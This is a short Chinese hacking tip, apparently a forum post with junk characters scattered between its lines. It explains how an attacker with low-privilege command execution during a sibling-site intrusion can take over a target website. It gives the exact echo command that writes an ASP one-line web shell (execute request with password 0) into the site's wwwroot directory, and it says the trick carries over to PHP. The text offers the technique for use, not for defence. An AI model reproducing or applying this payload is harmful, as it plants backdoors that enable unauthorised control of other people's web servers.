在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。: N3 h' u1 q- P' y1 d; w, A
( O9 y1 q! w/ S+ U( ?命令格式
8 Q; C5 V4 c1 P6 Q/ y2 ^2 L% ?
Echo 语句 >目标站绝对目录- y4 \5 r& O7 p: ]& t9 P8 G% h
% _4 S, ]# B3 _% Q1 k$ u, W
例如: ! C! X) V1 ?2 Y* v
. B5 i, K$ n% z3 V7 c) N1 v
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
) q6 ^! t h' ^: | m9 g. X: y8 M) x/ m* }# T: G2 u- R
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。) R' z8 E2 I7 q$ n
|